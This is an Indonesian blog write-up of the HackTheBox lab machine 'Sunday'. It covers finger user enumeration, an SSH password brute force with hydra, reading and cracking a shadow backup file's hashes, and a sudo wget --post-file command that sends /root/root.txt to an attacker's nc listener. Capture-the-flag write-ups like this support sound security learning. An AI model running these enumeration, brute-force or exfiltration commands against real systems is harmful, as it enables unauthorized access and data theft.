Sunday — HackTheBox Writeup

Posted on by joelindra

Halo semuanya, kali ini gw akan bahas writeup untuk mesin hackthebox, sunday.

Mari kita mulai dengan menjalankan nmap dengan perintah nmap -sV 10.10.10.76 -p- -T4 — min-rate 1000 — max-retries 2 — initial-rtt-timeout 500ms -Pn

Warning: 10.10.10.76 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.76
Host is up (0.19s latency).
Not shown: 58553 filtered tcp ports (no-response), 6977 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
111/tcp   open  rpcbind
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=12/14%Time=675D68BF%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
SF:\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x2
SF:0\x20\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nH
SF:ELP\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Nam
SF:e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Wh
SF:ere\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\
SF:.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%
SF:r(SSLSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\
SF:x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20
SF:\x20\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

Kamu akan mendapatkn beberapa informasi port yang terbuka seperti berikut. Kita bisa lihat finger daemon berjalan di port 79. Kita akan lakukan bruteforce finger tersebut dengan finger-user-enum dari pentestmonkey https://pentestmonkey.net/tools/user-enumeration/finger-user-enum

┌──(root㉿kali)-[~]
└─# perl finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sat Dec 14 06:29:56 2024 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Dec 14 11:41> 10.10.14.10         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Sat Dec 14 06:44:46 2024 #########
16 results.
10177 queries in 890 seconds (11.4 queries / sec)

kita akan fokus ke 2 user, sammy dan sunny. Kita akan coba login pada user sunny dengan command berikut ssh -p 22022 sunny@10.10.10.76 sebelumnya kita akan coba untuk lakukan bruteforce passwordnya terlebih dahulu menggunakan hydra dengan command berikut hydra -l sunny -P /usr/share/wordlists/rockyou.txt -vV ssh://10.10.10.76:22022

[VERBOSE] Retrying connection for child 5
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "yankees1" - 2369 of 14344400 [child 15] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "scarlet" - 2370 of 14344400 [child 1] (0/1)
[RE-ATTEMPT] target 10.10.10.76 - login "sunny" - pass "southpark" - 2370 of 14344400 [child 5] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "powers" - 2371 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "killua" - 2372 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "leandro" - 2373 of 14344400 [child 1] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "burbuja" - 2374 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "bonjour" - 2375 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "armani" - 2376 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "poop" - 2377 of 14344400 [child 1] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "nadia" - 2378 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "michigan" - 2379 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "astrid" - 2380 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "billybob" - 2381 of 14344400 [child 6] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "theman" - 2382 of 14344400 [child 2] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "sunday" - 2383 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "loquita" - 2384 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "kristy" - 2385 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "believe" - 2386 of 14344400 [child 13] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "missyou" - 2387 of 14344400 [child 6] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "english" - 2388 of 14344400 [child 2] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "timmy" - 2389 of 14344400 [child 11] (0/1)
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
[STATUS] attack finished for 10.10.10.76 (waiting for children to complete tests)
[ERROR] could not connect to target port 22022: Socket error: disconnected

dan kita dapatkan passwordnya. Lanjut kita akan coba login dengan kredensial tersebut dan mencari user flagnya.

Tampaknya kita membutuhkan privilege escalation. Kita cek terlebih dahulu perintah apa yang diijinkan ke user kita sekarang dengan sudo -l

Dan setelah mencari lebih dalam, disini kita mendapatkan folder backup

sunny@sunday:~$ cd /backup/
sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat shadow.backup 
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Kita coba untuk lakukank cracking user sammy dengan menggunakan jtr

disini kita dapatkan bahwa passwordnya adalah “cooldude!” kita akan coba login menggunakan user sammy.

┌──(root㉿kali)-[~]
└─# ssh -p 22022 sammy@10.10.10.76
(sammy@10.10.10.76) Password: 
Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Solaris 11.4.42.111.0                  Assembled December 2021
-bash-5.1$ ls
user.txt
-bash-5.1$ cat user.txt 
9e89b72e1447880............

Kita sudah dapat flag usernya, selanjutnya adalah mencari rootnya.

Karena disini user sammy dapat menjalankan perintah root, kita akan coba untuk langsung kirim file /root/root.txt sebagai POST request ke listening kita, mari kita buat listening terlebih dahulu dengan nc -lvnp 1212

nc -lnvp 1212
listening on [any] 1212 ...

Selanjutnya adalah mengirim /root/root.txt dengan wget

bash-5.1$ sudo wget http://10.10.14.10:1212 --post-file=/root/root.txt
--2024-12-14 12:17:00--  http://10.10.14.10:1212/
Connecting to 10.10.14.10:1212... connected.
HTTP request sent, awaiting response...

kita bisa kembali ke menu tap nc, dan bisa kita lihat isi file root.txt akan terlihat disitu.

┌──(root㉿kali)-[~]
└─# nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.76] 54655
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (solaris2.11)
Accept: */*
Accept-Encoding: identity
Host: 10.10.14.10:1212
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

6d2f31b56311942af......

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts